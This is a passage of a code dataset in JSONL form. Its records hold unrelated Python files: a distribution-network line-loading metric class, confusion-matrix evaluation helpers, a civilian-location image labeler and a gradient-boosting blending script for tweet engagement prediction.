DATE_FORMAT\n\n\nclass LineMetric(Metric):\n\n \"\"\" Class to 
compute metrics related to line elements in distribution network\n Metrics implemeted:\n 1) LLRI - line loading risk index\n 2) LE - line efficiency\n \"\"\"\n\n def __init__(self,dss_instance,config_dict,logger=None):\n\n \"\"\" Constructor for LineMetric Class\"\"\"\n\n super().__init__(dss_instance,config_dict,logger)\n\n self.metriclist = [\"LLRI\",\"LE\"]\n self.initialize_result_containers(self.metriclist)\n\n # Few other variables for stroing lossed and powers\n self.active_losses,self.pre_act_losses = {}, {}\n self.active_power, self.pre_act_power = {}, {}\n\n self.lineloading = {'TimeStamps':[]}\n \n for element in self.dss_instance.Lines.AllNames():\n for metric in self.metriclist:\n self.metric[metric][element] = 0\n self.timeseries_metric[metric][element] = []\n self.lineloading[element] = []\n\n self.active_losses[element] = 0\n self.active_power[element] = 0\n self.pre_act_losses[element] = 0\n self.pre_act_power[element] = 0\n\n self.read_files()\n\n # Check if line loading needs to be exported or not\n if self.config_dict['export_lineloadings']:\n self.export_start_time = dt.strptime(self.config_dict['export_start_date'],DATE_FORMAT)\n self.export_end_time = dt.strptime(self.config_dict['export_end_date'],DATE_FORMAT)\n\n self.logger.info('LineMetric class initiallized')\n\n def exportAPI(self, exportpath: str = '.'):\n \n super().exportAPI(exportpath=exportpath)\n\n if self.config_dict['export_lineloadings']:\n line_dataframe = pd.DataFrame(self.lineloading)\n line_dataframe = line_dataframe.set_index('TimeStamps')\n line_dataframe.to_csv(os.path.join(exportpath,'lineloading.csv'))\n self.logger.info('Line loadings exported successfully')\n\n def read_files(self):\n\n \"\"\" Read pickle file containing information on customers present\n downward of a node.\n \"\"\"\n if 'line_cust_down.p' not in os.listdir(self.config_dict['extra_data_path']):\n raise Exception(\"'line_cust_down.p' does not exist!!\")\n\n with open(os.path.join(self.config_dict['extra_data_path'],'line_cust_down.p'),\"rb\") as picklefile:\n self.line_cust_down = pickle.load(picklefile)\n\n def get_losses(self):\n\n \"\"\" return total line losses : updates every time stamps\"\"\"\n return self.losses\n \n\n def update(self,dss_instance,current_time,timeseries_record,count):\n\n \"\"\" update method (must be present)\"\"\"\n\n super().update(dss_instance,current_time,timeseries_record)\n\n if self.config_dict['export_lineloadings']:\n if self.export_start_time <= current_time <= self.export_end_time:\n self.lineloading['TimeStamps'].append(current_time)\n\n # loop through all line elements\n self.dss_instance.Circuit.SetActiveClass('Line')\n flag = self.dss_instance.Lines.First()\n\n while flag>0:\n \n line_name = self.dss_instance.Lines.Name()\n linecomplexcurrent = self.dss_instance.CktElement.Currents()\n line_current_limit = self.dss_instance.CktElement.NormalAmps()\n linecurrent = [math.sqrt(i ** 2 + j ** 2) for i, j in \\\n zip(linecomplexcurrent[::2], linecomplexcurrent[1::2])]\n loading = max(linecurrent)/line_current_limit\n\n # Compute for efficiency\n self.active_losses[line_name] += self.dss_instance.CktElement.Losses()[0]\n\n # will store losses from all line elements\n self.losses += self.dss_instance.CktElement.Losses()[0]\n \n complex_power = self.dss_instance.CktElement.Powers()\n frombuspower, tobuspower = sum(complex_power[:int(.5*len(complex_power)):2]), \\\n sum(complex_power[int(.5*len(complex_power))::2])\n\n self.active_power[line_name] += max(abs(frombuspower),abs(tobuspower))\n\n 
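# line efficiency in percent; the factor of 10 assumes Losses() reports W while Powers() reports kW\n 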
efficiency = 100 - self.active_losses[line_name]/(10*self.active_power[line_name]) if \\\n self.active_power[line_name]>0.01 else 100\n \n self.metric['LE'][line_name] = efficiency\n \n # Compute for LLRI\n\n gamma = loading - 1 if loading>1 else 0\n #self.gamma[line_name] = gamma\n self.metric['LLRI'][line_name] += (len(self.line_cust_down[line_name]) \\\n /self.dss_instance.Loads.Count())*gamma \\\n *self.config_dict[\"simulation_time_step (minute)\"]*100/count\n \n # updates impacted customers list if violation occurs\n if gamma > 0:\n self.customers_impacted = list(set(self.customers_impacted).union(set(self.line_cust_down[line_name])))\n \n # updates gamma for customers (depth of violation)\n for load_name in self.line_cust_down[line_name]:\n if self.gamma[load_name] < gamma:\n self.gamma[load_name] = gamma\n \n # Export line loadings\n if self.config_dict['export_lineloadings']:\n if self.export_start_time <= current_time <= self.export_end_time:\n self.lineloading[line_name].append(loading)\n\n if timeseries_record:\n\n # update time-series line efficiency\n loss_daily = self.active_losses[line_name] - self.pre_act_losses[line_name]\n power_daily = self.active_power[line_name] - self.pre_act_power[line_name]\n efficiency_daily = 100 - loss_daily/(10*power_daily) if power_daily>0.01 else 100\n self.timeseries_metric['LE'][line_name].append(efficiency_daily)\n self.pre_act_losses[line_name] = self.active_losses[line_name]\n self.pre_act_power[line_name] = self.active_power[line_name]\n\n # update time-series LLRI\n previousvalue = self.metric['LLRI'][line_name] - sum(self.timeseries_metric['LLRI'][line_name])\n self.timeseries_metric['LLRI'][line_name].append(previousvalue)\n \n flag = self.dss_instance.Lines.Next()","sub_path":"EMeRGE/dssmetrics/line_metrics.py","file_name":"line_metrics.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"60950182","text":"\n\nfrom xai.brain.wordbase.verbs._sculpt import _SCULPT\n\n#calss header\nclass _SCULPTING(_SCULPT, ):\n\tdef __init__(self,): \n\t\t_SCULPT.__init__(self)\n\t\tself.name = \"SCULPTING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"sculpt\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_sculpting.py","file_name":"_sculpting.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"604668715","text":"# Tools for expressing evaluation metrics on testing. \nfrom typing import Tuple,List\n\ndef genConMatrix(real: Tuple[int], assigned: Tuple[int], K: int)-> List[List[int]]: ####CONVERT INTO LINEAR?\n\t# generates a KxK confusion matrix of counts with rows indexing real class values\n\t# and columns indexing assigned values. Returned as list for memory convenience\n\t# During iterative testing. 
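For example, real=(0,1), assigned=(1,1) and K=2 yield [[0,1],[0,1]].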
\n\n\tmatrix = [[0 for n in range(K)] for m in range(K)]\n\n\tfor i in range(len(real)):\n\t\t# Iterates along measure sequences and adds count for \n\t\t# row designated in real sequence and column from assigned.\n\t\tmatrix[real[i]][assigned[i]] += 1\n\n\treturn matrix\n\ndef normConMatrix(matrix: List[List[int]])-> List[List[float]]:\n\t# Normalizes values in confusion matrix.\n\tnormMatrix = [[None for n in matrix[0]] for m in matrix]\n\n\ttotal = sum([sum(counts) for counts in matrix])\n\n\tfor i in range(len(matrix)):\n\t\tfor j in range(len(matrix[i])):\n\t\t\tnormMatrix[i][j] = matrix[i][j]/total\n\treturn normMatrix\n\ndef calcExpGain(conMatrix: List[List[float]], eGain: Tuple[Tuple[float]])-> float:\n\t# Calculates expected gain given a normalized confusion matrix conMatrix and \n\t# matrix of expected gain values eGain. Both must be of same size. \n\tK = len(conMatrix)\n\tvals = [conMatrix[real][assigned] * eGain[real][assigned] for real in range(K) for assigned in range(K)]\n\treturn sum(vals)\n\ndef main():\n#### unit tests\n\n### Makes sure confusion matrix is valid for toy examples.\n\tresults = (1,2,2)\n\trealVal1 = (2,1,2)\n\trealVal2 = (1,2,2)\n\n\ttest1 = genConMatrix(realVal1, results, 3)\n\ttest2 = genConMatrix(realVal2, results, 3)\n\n\tideal1 = [[0,0,0],[0,0,1],[0,1,1]]\n\tideal2 = [[0,0,0],[0,1,0],[0,0,2]]\n\n\tassert test1 == ideal1\n\tassert test2 == ideal2\n\n### Tests for normConMatrix to be properly cumulative\n\tmatrix = [[3,4,3,2],[3,2,3,4],[0,3,2,3],[8,3,2,4]]\n\ttotal = sum([sum(counts) for counts in normConMatrix(matrix)])\n\tassert total > .9999999999999995 and total < 1.0000000000005\n\n### Tests for normConMatrix to generate probabilities as expected\n\tmatrix = [[4,3,1],[2,2,2],[3,2,1]]\n\tassert normConMatrix(matrix) == [[.2,.15,.05],[.1,.1,.1],[.15,.1,.05]],normConMatrix(matrix)\n\n### Tests for calcExpGain\n\tmatrix = [[.3,.3], [.04,.36]]\n\tegain = ((1,0),(0,2))\n\texpected = calcExpGain(matrix, egain)\n\tassert expected == 1.02, expected\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"beta/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"222486227","text":"from module.myModule import *\n\nmapName = \"\"\nGRID_COL = 0\nGRID_ROW = 0\n\nif len(sys.argv) != 4:\n print(\"Usage : python Labeler_test.py [Map name][Grid row][Grid col]\")\n exit(1)\nelse:\n mapName = sys.argv[1]\n GRID_ROW = int(sys.argv[2])\n GRID_COL = int(sys.argv[3])\n\n# Label matrix\n# [ Number of civilians ]\nLABEL = [[0]*GRID_COL for i in range(GRID_ROW)]\n\n# Grid matrix\n# [ minX, maxX, minY, maxY ]\nGRID = [[[0, 0, 0, 0]]*GRID_COL for i in range(GRID_ROW)]\ngrid = \"%dx%d\" % (GRID_ROW, GRID_COL)\nif not os.path.exists(\"%s/%s/%s\" % (MODELS_DIR, mapName, grid)):\n os.makedirs(\"%s/%s/%s\" % (MODELS_DIR, mapName, grid))\n\n# Log\nnow = datetime.datetime.now().strftime(\"%d %H:%M:%S\")\nprint('[INFO][%s] Image label start' % now)\nprint('[INFO] Data sets root: %s/%s' % (LABEL_TEST_DATASET_DIR, mapName))\nprint('[INFO] Label %s #%d ~ #%d data sets' % (mapName, LABEL_TEST_START_MAP_NUM, LABEL_TEST_END_MAP_NUM))\n\n# Filtering and Labeling the images\n# Filtering : crop and resize\n# Labeling : depends on the time step limit and civilians' HP\nHPListIndex = 0\nfor dataSetNum in range(LABEL_TEST_START_MAP_NUM, LABEL_TEST_END_MAP_NUM+1):\n dataSetPath = \"%s/raw/test/generated_image/%s/%s_%d\" % (LABEL_TEST_DATASET_DIR, mapName, mapName, 
dataSetNum)\n\n # Read information files for labeling\n mapInfoFile = open(\"%s/Parse/mapInfo.txt\" % dataSetPath, 'r')\n civilianLocFile = open(\"%s/Parse/civilianLoc.txt\" % dataSetPath, 'r')\n civilianHPFile = open(\"%s/Parse/civilianHP.txt\" % dataSetPath, 'r')\n\n # Create or Copy the Label directory\n if os.path.exists(\"%s/Label/%s\" % (dataSetPath, grid)):\n shutil.rmtree(\"%s/Label/%s\" % (dataSetPath, grid))\n os.makedirs(\"%s/Label/%s\" % (dataSetPath, grid))\n\n # Set map's width and height\n initWidth = 0\n initHeight = 0\n endWidth = mapInfoFile.readline().strip('\\n')\n endHeight = mapInfoFile.readline().strip('\\n')\n\n # Assign grid cell's range\n for row in range(0, GRID_ROW):\n for col in range(0, GRID_COL):\n GRID[row][col] = [(col * (int(float(endWidth)) / GRID_COL)),\n ((col + 1) * (int(float(endWidth)) / GRID_COL)),\n ((GRID_ROW - (row + 1)) * (int(float(endHeight)) / GRID_ROW)),\n ((GRID_ROW - row) * (int(float(endHeight)) / GRID_ROW))]\n\n # Labeling the images\n imageListFile = open(\"%s/Label/%s/ImageList.txt\" % (dataSetPath, grid), \"w+\")\n while True:\n # Parsing the map data\n # Read time step\n line = civilianLocFile.readline().strip('\\n')\n if not line: break\n step = int(line)\n civilianHPFile.readline()\n # Read civilian locations and HP list\n HPList = civilianHPFile.readline().split(' ')\n locList = civilianLocFile.readline().split('>')\n for eachLoc in locList:\n eachLoc = eachLoc.strip(' ')\n eachLoc = eachLoc.strip('<')\n if eachLoc != '' and eachLoc != '\\n':\n eachLoc = eachLoc.split(', ')\n x = int(eachLoc[0])\n y = int(eachLoc[1])\n\n # Check civilian's coordinate within cell\n for row in range(0, GRID_ROW):\n for col in range(0, GRID_COL):\n if GRID[row][col][0] <= x <= GRID[row][col][1] and GRID[row][col][2] <= y <= GRID[row][col][3]:\n if int(HPList[HPListIndex]) <= LIMIT_CIVILIAN_HP:\n LABEL[row][col] = int(LABEL[row][col]) + 1\n HPListIndex = HPListIndex + 1\n\n # Copy converted image to data set's label directory\n # Longer than LIMIT_TIME_STEP\n if step > LIMIT_TIME_STEP:\n label = []\n for row in range(0, GRID_ROW):\n for col in range(0, GRID_COL):\n label.append(int(LABEL[row][col]))\n image = \"%s/Image/%s_%d_Time_%d.png\" % (dataSetPath, mapName, dataSetNum, step)\n if os.path.isfile(\"%s\" % image):\n imageListFile.write(image)\n for eachLabel in label:\n imageListFile.write(\" \" + str(eachLabel))\n imageListFile.write(\"\\n\")\n else:\n print(\"[INFO] %s %s is not exist.\" % (dataSetPath, image))\n\n # Initialize label matrix\n LABEL = [[0] * GRID_COL for i in range(GRID_ROW)]\n HPListIndex = 0\n now = datetime.datetime.now().strftime(\"%d %H:%M:%S\")\n imageListFile.close()\n print('[INFO][%s] %s_%d images are labeled' % (now, mapName, dataSetNum))\n","sub_path":"Labeler_test.py","file_name":"Labeler_test.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"430432055","text":"import time\n\nfrom Models.GBM.LightGBM import LightGBM\nfrom ParamTuning.Optimizer import Optimizer\nfrom Utils.Data import Data\nimport pandas as pd\n\nfrom Utils.Data.Data import get_dataset_xgb_batch\nfrom Utils.Data.Features.Generated.EnsemblingFeature.LGBMEnsemblingFeature import LGBMEnsemblingFeature\nfrom sklearn.model_selection import train_test_split\nimport time\nimport Blending.like_params as like_params\nimport Blending.reply_params as reply_params\nimport Blending.retweet_params as retweet_params\nimport Blending.comment_params as 
comment_params\nfrom Utils.Data.Features.Generated.EnsemblingFeature.XGBEnsembling import XGBEnsembling\nimport argparse\nfrom tqdm import tqdm\n\nfrom Utils.Data.Features.Generated.EnsemblingFeature.XGBFoldEnsembling import *\nfrom Utils.Submission.Submission import create_submission_file\n\n\ndef prediction(LGBM, dataset_id, df, label):\n\n tweets = Data.get_feature(\"raw_feature_tweet_id\", dataset_id)[\"raw_feature_tweet_id\"].array\n users = Data.get_feature(\"raw_feature_engager_id\", dataset_id)[\"raw_feature_engager_id\"].array\n\n # LGBM Prediction\n prediction_start_time = time.time()\n predictions = LGBM.get_prediction(df.to_numpy())\n print(f\"Prediction time: {time.time() - prediction_start_time} seconds\")\n\n # Uncomment to plot feature importance at the end of training\n # LGBM.plot_fimportance()\n\n create_submission_file(tweets, users, predictions, f\"{dataset_id}_{label}_lgbm_blending_submission.csv\")\n\n\ndef get_ensembling_label(label, dataset_id):\n from Utils.Data import Data\n return Data.get_feature_batch(f\"tweet_feature_engagement_is_{label}\",\n dataset_id, total_n_split=1, split_n=0, sample=0.3)\n\n\ndef get_nn_prediction(label, model_id, dataset_id):\n df = pd.read_csv(f'Dataset/Features/{dataset_id}/ensembling/nn_predictions_{label}_{model_id}.csv',\n header=None, names=[0, 1, 2], usecols=[2])\n df.columns = [f'nn_predictions_{label}_{model_id}']\n return df\n\ndef params_by_label(label):\n\n if label in [\"like\"]:\n lgbm_params = like_params.lgbm_get_params()\n xgb_params = like_params.xgb_get_params()\n elif label in [\"reply\"]:\n lgbm_params = reply_params.lgbm_get_params()\n xgb_params = reply_params.xgb_get_params()\n elif label in [\"retweet\"]:\n lgbm_params = retweet_params.lgbm_get_params()\n xgb_params = retweet_params.xgb_get_params()\n elif label in [\"comment\"]:\n lgbm_params = comment_params.lgbm_get_params()\n xgb_params = comment_params.xgb_get_params()\n else:\n assert False, \"What?\"\n\n return lgbm_params, xgb_params\n\n\ndef main():\n # Instantiate the parser\n parser = argparse.ArgumentParser()\n\n parser.add_argument('label', type=str,\n help='required argument: label')\n\n args = parser.parse_args()\n\n nn_labels = [\"like\", \"reply\", \"retweet\", \"comment\"]\n\n LABEL = args.label\n\n assert LABEL in [\"like\", \"reply\", \"retweet\", \"comment\"], \"LABEL not valid.\"\n\n print(f\"label is {LABEL}\")\n\n features = [\"raw_feature_creator_follower_count\",\n \"raw_feature_creator_following_count\",\n \"raw_feature_engager_follower_count\",\n \"raw_feature_engager_following_count\",\n \"raw_feature_creator_is_verified\",\n \"raw_feature_engager_is_verified\",\n \"raw_feature_engagement_creator_follows_engager\",\n \"tweet_feature_number_of_photo\",\n \"tweet_feature_number_of_video\",\n \"tweet_feature_number_of_gif\",\n \"tweet_feature_number_of_media\",\n \"tweet_feature_is_retweet\",\n \"tweet_feature_is_quote\",\n \"tweet_feature_is_top_level\",\n \"tweet_feature_number_of_hashtags\",\n \"tweet_feature_creation_timestamp_hour\",\n \"tweet_feature_creation_timestamp_week_day\",\n # \"tweet_feature_number_of_mentions\",\n \"tweet_feature_token_length\",\n \"tweet_feature_token_length_unique\",\n \"tweet_feature_text_topic_word_count_adult_content\",\n \"tweet_feature_text_topic_word_count_kpop\",\n \"tweet_feature_text_topic_word_count_covid\",\n \"tweet_feature_text_topic_word_count_sport\",\n \"number_of_engagements_with_language_like\",\n \"number_of_engagements_with_language_retweet\",\n 
\"number_of_engagements_with_language_reply\",\n \"number_of_engagements_with_language_comment\",\n \"number_of_engagements_with_language_negative\",\n \"number_of_engagements_with_language_positive\",\n \"number_of_engagements_ratio_like\",\n \"number_of_engagements_ratio_retweet\",\n \"number_of_engagements_ratio_reply\",\n \"number_of_engagements_ratio_comment\",\n \"number_of_engagements_ratio_negative\",\n \"number_of_engagements_ratio_positive\",\n \"number_of_engagements_between_creator_and_engager_like\",\n \"number_of_engagements_between_creator_and_engager_retweet\",\n \"number_of_engagements_between_creator_and_engager_reply\",\n \"number_of_engagements_between_creator_and_engager_comment\",\n \"number_of_engagements_between_creator_and_engager_negative\",\n \"number_of_engagements_between_creator_and_engager_positive\",\n \"creator_feature_number_of_like_engagements_received\",\n \"creator_feature_number_of_retweet_engagements_received\",\n \"creator_feature_number_of_reply_engagements_received\",\n \"creator_feature_number_of_comment_engagements_received\",\n \"creator_feature_number_of_negative_engagements_received\",\n \"creator_feature_number_of_positive_engagements_received\",\n \"creator_feature_number_of_like_engagements_given\",\n \"creator_feature_number_of_retweet_engagements_given\",\n \"creator_feature_number_of_reply_engagements_given\",\n \"creator_feature_number_of_comment_engagements_given\",\n \"creator_feature_number_of_negative_engagements_given\",\n \"creator_feature_number_of_positive_engagements_given\",\n \"engager_feature_number_of_like_engagements_received\",\n \"engager_feature_number_of_retweet_engagements_received\",\n \"engager_feature_number_of_reply_engagements_received\",\n \"engager_feature_number_of_comment_engagements_received\",\n \"engager_feature_number_of_negative_engagements_received\",\n \"engager_feature_number_of_positive_engagements_received\",\n \"number_of_engagements_like\",\n \"number_of_engagements_retweet\",\n \"number_of_engagements_reply\",\n \"number_of_engagements_comment\",\n \"number_of_engagements_negative\",\n \"number_of_engagements_positive\",\n \"engager_feature_number_of_previous_like_engagement\",\n \"engager_feature_number_of_previous_reply_engagement\",\n \"engager_feature_number_of_previous_retweet_engagement\",\n \"engager_feature_number_of_previous_comment_engagement\",\n \"engager_feature_number_of_previous_positive_engagement\",\n \"engager_feature_number_of_previous_negative_engagement\",\n \"engager_feature_number_of_previous_engagement\",\n \"engager_feature_number_of_previous_like_engagement_ratio_1\",\n \"engager_feature_number_of_previous_reply_engagement_ratio_1\",\n \"engager_feature_number_of_previous_retweet_engagement_ratio_1\",\n \"engager_feature_number_of_previous_comment_engagement_ratio_1\",\n \"engager_feature_number_of_previous_positive_engagement_ratio_1\",\n \"engager_feature_number_of_previous_negative_engagement_ratio_1\",\n \"engager_feature_number_of_previous_like_engagement_ratio\",\n \"engager_feature_number_of_previous_reply_engagement_ratio\",\n \"engager_feature_number_of_previous_retweet_engagement_ratio\",\n \"engager_feature_number_of_previous_comment_engagement_ratio\",\n \"engager_feature_number_of_previous_positive_engagement_ratio\",\n \"engager_feature_number_of_previous_negative_engagement_ratio\",\n \"engager_feature_number_of_previous_like_engagement_between_creator_and_engager_by_creator\",\n 
\"engager_feature_number_of_previous_reply_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_retweet_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_comment_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_negative_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_positive_engagement_between_creator_and_engager_by_creator\",\n \"engager_feature_number_of_previous_like_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_reply_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_retweet_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_comment_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_negative_engagement_between_creator_and_engager_by_engager\",\n \"engager_feature_number_of_previous_positive_engagement_between_creator_and_engager_by_engager\",\n # \"tweet_feature_number_of_previous_like_engagements\",\n # \"tweet_feature_number_of_previous_reply_engagements\",\n # \"tweet_feature_number_of_previous_retweet_engagements\",\n # \"tweet_feature_number_of_previous_comment_engagements\",\n # \"tweet_feature_number_of_previous_positive_engagements\",\n # \"tweet_feature_number_of_previous_negative_engagements\",\n \"creator_feature_number_of_previous_like_engagements_given\",\n \"creator_feature_number_of_previous_reply_engagements_given\",\n \"creator_feature_number_of_previous_retweet_engagements_given\",\n \"creator_feature_number_of_previous_comment_engagements_given\",\n \"creator_feature_number_of_previous_positive_engagements_given\",\n \"creator_feature_number_of_previous_negative_engagements_given\",\n \"creator_feature_number_of_previous_like_engagements_received\",\n \"creator_feature_number_of_previous_reply_engagements_received\",\n \"creator_feature_number_of_previous_retweet_engagements_received\",\n \"creator_feature_number_of_previous_comment_engagements_received\",\n \"creator_feature_number_of_previous_positive_engagements_received\",\n \"creator_feature_number_of_previous_negative_engagements_received\",\n \"engager_feature_number_of_previous_like_engagement_with_language\",\n \"engager_feature_number_of_previous_reply_engagement_with_language\",\n \"engager_feature_number_of_previous_retweet_engagement_with_language\",\n \"engager_feature_number_of_previous_comment_engagement_with_language\",\n \"engager_feature_number_of_previous_positive_engagement_with_language\",\n \"engager_feature_number_of_previous_negative_engagement_with_language\",\n \"engager_feature_knows_hashtag_positive\",\n \"engager_feature_knows_hashtag_negative\",\n \"engager_feature_knows_hashtag_like\",\n \"engager_feature_knows_hashtag_reply\",\n \"engager_feature_knows_hashtag_rt\",\n \"engager_feature_knows_hashtag_comment\",\n \"creator_and_engager_have_same_main_language\",\n \"is_tweet_in_creator_main_language\",\n \"is_tweet_in_engager_main_language\",\n # \"statistical_probability_main_language_of_engager_engage_tweet_language_1\",\n # \"statistical_probability_main_language_of_engager_engage_tweet_language_2\",\n \"creator_and_engager_have_same_main_grouped_language\",\n \"is_tweet_in_creator_main_grouped_language\",\n \"is_tweet_in_engager_main_grouped_language\",\n # # \"hashtag_similarity_fold_ensembling_positive\",\n # # 
\"link_similarity_fold_ensembling_positive\",\n # # \"domain_similarity_fold_ensembling_positive\"\n \"tweet_feature_creation_timestamp_hour_shifted\",\n \"tweet_feature_creation_timestamp_day_phase\",\n \"tweet_feature_creation_timestamp_day_phase_shifted\"\n ]\n\n label = [\n f\"tweet_feature_engagement_is_{LABEL}\"\n ]\n\n train_dataset = \"cherry_train\"\n val_dataset = \"cherry_val\"\n test_dataset = \"new_test\"\n private_test_dataset = \"last_test\"\n\n ensembling_list_dict = {\n 'like': ['reply', 'retweet', 'comment'],\n 'reply': ['reply', 'retweet', 'comment'],\n 'retweet': ['reply', 'retweet', 'comment'],\n 'comment': ['reply', 'retweet', 'comment'],\n }\n\n ensembling_list = ensembling_list_dict[LABEL]\n\n ensembling_lgbm_params = {}\n ensembling_xgb_params = {}\n for ens_label in ensembling_list:\n ensembling_lgbm_params[ens_label], ensembling_xgb_params[ens_label] \\\n = params_by_label(ens_label)\n\n categorical_features_set = set([])\n\n\n # Load train data\n # loading_data_start_time = time.time()\n # df_train, df_train_label = Data.get_dataset_xgb(train_dataset, features, label)\n # print(f\"Loading train data time: {loading_data_start_time - time.time()} seconds\")\n\n # Load val data\n df_val, df_val_label = Data.get_dataset_xgb(val_dataset, features, label)\n\n # Load test data\n df_test = Data.get_dataset(features, test_dataset)\n df_private = Data.get_dataset(features, private_test_dataset)\n\n new_index = pd.Series(df_test.index).map(lambda x: x + len(df_val))\n df_test.set_index(new_index, inplace=True)\n\n new_index_private = pd.Series(df_private.index).map(lambda x: x + len(df_val) + len(df_test))\n df_private.set_index(new_index_private, inplace=True)\n\n\n # df to be predicted by the lgbm blending feature\n df_to_predict = pd.concat([df_val, df_test, df_private])\n\n # BLENDING FEATURE DECLARATION\n\n feature_list = []\n\n # NEW CODE ADDED\n\n df_train = pd.DataFrame(columns=features)\n df_train_label = pd.DataFrame(columns=label)\n need_to_load_train_set = False\n\n for ens_label in ensembling_list:\n lgbm_params = ensembling_lgbm_params[ens_label]\n for lgbm_param_dict in lgbm_params:\n start_time = time.time()\n if not LGBMEnsemblingFeature(dataset_id=private_test_dataset,\n df_train=df_train,\n df_train_label=get_ensembling_label(ens_label, train_dataset),\n df_to_predict=df_to_predict,\n param_dict=lgbm_param_dict,\n categorical_features_set=categorical_features_set).has_feature():\n print(f\"{ens_label} {lgbm_param_dict}\")\n need_to_load_train_set = True\n\n if need_to_load_train_set:\n df_train, df_train_label = get_dataset_xgb_batch(total_n_split=1, split_n=0, dataset_id=train_dataset,\n X_label=features, Y_label=label, sample=0.3)\n\n\n for ens_label in ensembling_list:\n lgbm_params = ensembling_lgbm_params[ens_label]\n for lgbm_param_dict in lgbm_params:\n start_time = time.time()\n feature_list.append(LGBMEnsemblingFeature(dataset_id=private_test_dataset,\n df_train=df_train,\n df_train_label=get_ensembling_label(ens_label, train_dataset),\n df_to_predict=df_to_predict,\n param_dict=lgbm_param_dict,\n categorical_features_set=categorical_features_set))\n\n # NEW PARTll\n # ONLY THIS PART IS NEW\n # LOAD THIS PART FIRST\n del df_train, df_train_label\n\n df_feature_list = [x.load_or_create() for x in tqdm(feature_list)]\n\n for ens_label in ensembling_list:\n start_time = time.time()\n if ens_label == \"like\":\n val_features_df = XGBFoldEnsemblingLike2(val_dataset).load_or_create()\n test_features_df = 
XGBFoldEnsemblingLike2(test_dataset).load_or_create()\n private_features_df = XGBFoldEnsemblingLike2(private_test_dataset).load_or_create()\n elif ens_label == \"retweet\":\n val_features_df = XGBFoldEnsemblingRetweet2(val_dataset).load_or_create()\n test_features_df = XGBFoldEnsemblingRetweet2(test_dataset).load_or_create()\n private_features_df = XGBFoldEnsemblingRetweet2(private_test_dataset).load_or_create()\n elif ens_label == \"reply\":\n val_features_df = XGBFoldEnsemblingReply2(val_dataset).load_or_create()\n test_features_df = XGBFoldEnsemblingReply2(test_dataset).load_or_create()\n private_features_df = XGBFoldEnsemblingReply2(private_test_dataset).load_or_create()\n elif ens_label == \"comment\":\n val_features_df = XGBFoldEnsemblingComment2(val_dataset).load_or_create()\n test_features_df = XGBFoldEnsemblingComment2(test_dataset).load_or_create()\n private_features_df = XGBFoldEnsemblingComment2(private_test_dataset).load_or_create()\n else:\n assert False, \"oh oh something went wrong. label not found\"\n\n test_features_df.set_index(new_index, inplace=True)\n private_features_df.set_index(new_index_private, inplace=True)\n\n xgb_feature_df = pd.concat([val_features_df, test_features_df, private_features_df])\n\n df_feature_list.append(xgb_feature_df)\n\n print(f\"time: {time.time() - start_time}\")\n\n del val_features_df, test_features_df, private_features_df\n\n\n # check dimensions\n len_val = len(df_val)\n len_test = len(df_test)\n len_private = len(df_private)\n\n for df_feat in df_feature_list:\n assert len(df_feat) == (len_val + len_test + len_private), \\\n f\"Blending features are not of dimension expected, len val: {len_val} len test: {len_test}\" \\\n f\" len private test: {len_private}\\n \" \\\n f\"obtained len: {len(df_feat)} of {df_feat.columns[0]}\\n\"\n\n # split feature dataframe in validation and testing\n df_feat_val_list = [df_feat.iloc[:len_val] for df_feat in df_feature_list]\n df_feat_test_list = [df_feat.iloc[len_val:-len_private] for df_feat in df_feature_list]\n df_feat_private_list = [df_feat.iloc[-len_private:] for df_feat in df_feature_list]\n\n df_feat_nn_val_list_1 = [get_nn_prediction(l, 1, val_dataset) for l in nn_labels]\n df_feat_nn_val_list_2 = [get_nn_prediction(l, 2, val_dataset) for l in nn_labels]\n df_feat_nn_val_list = df_feat_nn_val_list_1 + df_feat_nn_val_list_2\n\n df_feat_nn_test_list_1 = [get_nn_prediction(l, 1, test_dataset) for l in nn_labels]\n df_feat_nn_test_list_2 = [get_nn_prediction(l, 2, test_dataset) for l in nn_labels]\n df_feat_nn_test_list = df_feat_nn_test_list_1 + df_feat_nn_test_list_2\n\n df_feat_nn_private_list_1 = [get_nn_prediction(l, 1, private_test_dataset) for l in nn_labels]\n df_feat_nn_private_list_2 = [get_nn_prediction(l, 2, private_test_dataset) for l in nn_labels]\n df_feat_nn_private_list = df_feat_nn_private_list_1 + df_feat_nn_private_list_2\n\n for df_feat_nn_test in df_feat_nn_test_list:\n new_index = pd.Series(df_feat_nn_test.index).map(lambda x: x + len(df_val))\n df_feat_nn_test.set_index(new_index, inplace=True)\n\n for df_feat_nn_private in df_feat_nn_private_list:\n new_index_private = pd.Series(df_feat_nn_private.index).map(lambda x: x + len(df_val) + len(df_test))\n df_feat_nn_private.set_index(new_index_private, inplace=True)\n\n df_feat_val_list += df_feat_nn_val_list\n df_feat_test_list += df_feat_nn_test_list\n df_feat_private_list += df_feat_nn_private_list\n\n df_val_to_be_concatenated_list = [df_val] + df_feat_val_list + [df_val_label]\n df_test_to_be_concatenated_list = 
